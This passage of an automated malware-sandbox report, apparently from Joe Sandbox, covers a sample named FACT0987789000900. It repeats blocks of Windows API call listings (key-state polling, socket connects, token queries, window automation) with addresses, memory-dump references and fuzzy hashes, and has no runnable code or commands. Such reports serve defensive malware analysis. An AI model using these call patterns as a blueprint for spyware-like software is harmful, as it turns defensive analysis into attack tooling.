                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004E1349
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: 56c83bcbd6ee9cd70fe30793a866ef0cd8ed25b2ca3967694d686df1778f54be
                                                                                                                • Instruction ID: 5410c0531df7dd0c38053434a832aba25f5f76e09aae7bd8c0bfe3c976a6350b
                                                                                                                • Opcode Fuzzy Hash: 56c83bcbd6ee9cd70fe30793a866ef0cd8ed25b2ca3967694d686df1778f54be
                                                                                                                • Instruction Fuzzy Hash: 34412D35A00105DFDF01EF65C9819AEBBF5FF08314B1480AAE91AAB361DB35ED01DB54
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(000000FF), ref: 004AB64F
                                                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 004AB691
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 004AB69F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: b57a04f8d36d9a812a8d17e7c87ce1d5da9882ea9067b2735efdff84c9b8765c
                                                                                                                • Instruction ID: 6f551ea22b79e10f5fd1f501725b17f350c77e07a35cb43d53355c2ff76f2a87
                                                                                                                • Opcode Fuzzy Hash: b57a04f8d36d9a812a8d17e7c87ce1d5da9882ea9067b2735efdff84c9b8765c
                                                                                                                • Instruction Fuzzy Hash: DE418131504109FBCF159F64C844AEDBB74FB16324F10831AF829962D1CB34AD94DFA5
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004CB369
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 004CB413
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004CB41B
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 004CB429
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004CB431
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: b2e406e3e0d90d2414c2a49a17e6cc42129e82d52e6d4cc1d5319ea662dd47f8
                                                                                                                • Instruction ID: b2ea0498daa8889ae8c859206eccb008de714678f4d09d827ae4b9c154d78629
                                                                                                                • Opcode Fuzzy Hash: b2e406e3e0d90d2414c2a49a17e6cc42129e82d52e6d4cc1d5319ea662dd47f8
                                                                                                                • Instruction Fuzzy Hash: D531F175900259EBDF04CF68DD4EBDE3BB5EB00319F00822AF820A72D1C3B49914DB94
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 004CDBD7
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004CDBF4
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004CDC2C
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004CDC52
                                                                                                                • _wcsstr.LIBCMT ref: 004CDC5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 5f5146ac048b05b905c2a4b639fdaccef05cfab16a7849a5507a38dfb9942db8
                                                                                                                • Instruction ID: f0e084b4fd2f3deb64d788aea58773345552e68ed30571ffb3f9420ecd553d0a
                                                                                                                • Opcode Fuzzy Hash: 5f5146ac048b05b905c2a4b639fdaccef05cfab16a7849a5507a38dfb9942db8
                                                                                                                • Instruction Fuzzy Hash: A0212975604200BBEB555F79DC49FBB7BA8DF55750F10803FF809CA191EAA9DC01E268
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004CBC90
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004CBCC2
                                                                                                                • __itow.LIBCMT ref: 004CBCDA
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004CBD00
                                                                                                                • __itow.LIBCMT ref: 004CBD11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: e977d76146c5eb86730a4d39b5adf0cbb6c76153ec81c20341115dfc0943f69f
                                                                                                                • Instruction ID: ec12ba14276cb07393fa3e9cd1599f73cacedcd35b5f1a2c6012d1fe40e118ae
                                                                                                                • Opcode Fuzzy Hash: e977d76146c5eb86730a4d39b5adf0cbb6c76153ec81c20341115dfc0943f69f
                                                                                                                • Instruction Fuzzy Hash: FE21A7396002187ADB51AA668C47FDF7A6CEF5A714F10402EF906EB181DB68890587E5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004950E6: _wcsncpy.LIBCMT ref: 004950FA
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,004D60C3), ref: 004D6369
                                                                                                                • GetLastError.KERNEL32(?,?,?,004D60C3), ref: 004D6374
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004D60C3), ref: 004D6388
                                                                                                                • _wcsrchr.LIBCMT ref: 004D63AA
                                                                                                                  • Part of subcall function 004D6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004D60C3), ref: 004D63E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3633006590-0
                                                                                                                • Opcode ID: d30c9dbf895dbb1df7aa5981c53a790996f05e380267f870da4bd6dd9e28d06a
                                                                                                                • Instruction ID: 121e2fcc75686e95ce9258e98ebef483e2f30472072bd28235867ec99d05b845
                                                                                                                • Opcode Fuzzy Hash: d30c9dbf895dbb1df7aa5981c53a790996f05e380267f870da4bd6dd9e28d06a
                                                                                                                • Instruction Fuzzy Hash: D32138305042145BDB15EB79AC62FEB23ACAF1A360F11446FF815C33C1EB68D9859A6D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004EA82C: inet_addr.WS2_32(00000000), ref: 004EA84E
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004E8BD3
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8BE2
                                                                                                                • connect.WS2_32(00000000,?,00000010), ref: 004E8BFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 3701255441-0
                                                                                                                • Opcode ID: fa62d245b7a3052fd60bc9e0d8ca2182cb137c25bf985a5a41c9b41a39fdb579
                                                                                                                • Instruction ID: f4f094bd3005fbbe2f088fe01f24c29d08107a6add70e963d4cd3dbd55149721
                                                                                                                • Opcode Fuzzy Hash: fa62d245b7a3052fd60bc9e0d8ca2182cb137c25bf985a5a41c9b41a39fdb579
                                                                                                                • Instruction Fuzzy Hash: A221A1312001149FCB10AF29CD85BBE77A9EF59725F04845EF9169B3D2CB78AC058765
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 004E8441
                                                                                                                • GetForegroundWindow.USER32 ref: 004E8458
                                                                                                                • GetDC.USER32(00000000), ref: 004E8494
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 004E84A0
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 004E84DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: e65008335849cfd1385902202f3c97773cab7297cc1c59368103bc34b18256e9
                                                                                                                • Instruction ID: 9fb84939b18309dfc4734c4c928deb214e034dc86eb96e1d33d57540867569c1
                                                                                                                • Opcode Fuzzy Hash: e65008335849cfd1385902202f3c97773cab7297cc1c59368103bc34b18256e9
                                                                                                                • Instruction Fuzzy Hash: 6821A135A00204AFDB00EFA5D984AAEBBF5EF48345F04C47EE84A97351DB74AC04DBA4
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004AAFF2
                                                                                                                • BeginPath.GDI32(?), ref: 004AB009
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004AB033
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: da83e40977dfadf66976c40eb398cd6c365cd151bf5812686febe5da93886b81
                                                                                                                • Instruction ID: 3706a9714f489033520ee44df8b4942d796c0241092f77b7447a94a757323cfe
                                                                                                                • Opcode Fuzzy Hash: da83e40977dfadf66976c40eb398cd6c365cd151bf5812686febe5da93886b81
                                                                                                                • Instruction Fuzzy Hash: 40219DB0800709AFDB209F95EC5879B7F78FB313A6F14871BF420922A1D3745859EB99
                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 004B21A9
                                                                                                                • CreateThread.KERNEL32(?,?,004B22DF,00000000,?,?), ref: 004B21ED
                                                                                                                • GetLastError.KERNEL32 ref: 004B21F7
                                                                                                                • _free.LIBCMT ref: 004B2200
                                                                                                                • __dosmaperr.LIBCMT ref: 004B220B
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2664167353-0
                                                                                                                • Opcode ID: 29b6819f6d457adf134b9629feba0100c6524eb9d16430e6ba7aca27429b6a17
                                                                                                                • Instruction ID: 43629cf837cffa4de566148aebf532b5572e49781fc9b7954cca4876b3234ac1
                                                                                                                • Opcode Fuzzy Hash: 29b6819f6d457adf134b9629feba0100c6524eb9d16430e6ba7aca27429b6a17
                                                                                                                • Instruction Fuzzy Hash: 091148321043066F9B11AFAADD41DDB3BA8EF44774710042FF924C6181DBB9D8119BB9
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
                                                                                                                • GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
                                                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 883493501-0
                                                                                                                • Opcode ID: db18f14f3fec190e6402a257bc3599975f4fe4bcea1b9e3a8bae163f7c2273bd
                                                                                                                • Instruction ID: a5b76eb3930b4fab9ca70d3b031aae66f24fac443b788a1ff48a18c878ff8d35
                                                                                                                • Opcode Fuzzy Hash: db18f14f3fec190e6402a257bc3599975f4fe4bcea1b9e3a8bae163f7c2273bd
                                                                                                                • Instruction Fuzzy Hash: E8016D78200208BFDB104FA5DC4CEAB3BBDEF99358710442AFA05C3260D6718C54DB74
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7A74
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004D7A82
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004D7A8A
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004D7A94
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: 5f747ce2d71601e5fcc5f8beeccf033c4ea4b67bb1e6bcd2f533a1f9663d9e71
                                                                                                                • Instruction ID: a680611fab7409f41390ec4981905ac207e1160053f7c8f93651846859aca5d5
                                                                                                                • Opcode Fuzzy Hash: 5f747ce2d71601e5fcc5f8beeccf033c4ea4b67bb1e6bcd2f533a1f9663d9e71
                                                                                                                • Instruction Fuzzy Hash: 57012935C04629EBCF00AFE4DC58ADEBB78FB18711F008457E502B2350EB789654D7A9
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.COMBASE ref: 004C9ADC
                                                                                                                • ProgIDFromCLSID.COMBASE(?,00000000), ref: 004C9AF7
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 004C9B05
                                                                                                                • CoTaskMemFree.COMBASE(00000000), ref: 004C9B15
                                                                                                                • CLSIDFromString.COMBASE(?,?), ref: 004C9B21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: 4c61e2613ab94219d97b53f5c22450483059396f90647e044ad1614d4b38c96c
                                                                                                                • Instruction ID: 42a390102bf90ce4817d501a7d73ae37c50dfddf3182c31ae9a3e8225f0564a3
                                                                                                                • Opcode Fuzzy Hash: 4c61e2613ab94219d97b53f5c22450483059396f90647e044ad1614d4b38c96c
                                                                                                                • Instruction Fuzzy Hash: 24018F7A600214BFDB104F58EC48FAA7BFDEB54751F148029F905D2210E778ED04ABB0
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004CAA79
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004CAA83
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004CAA92
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004CAA99
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004CAAAF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
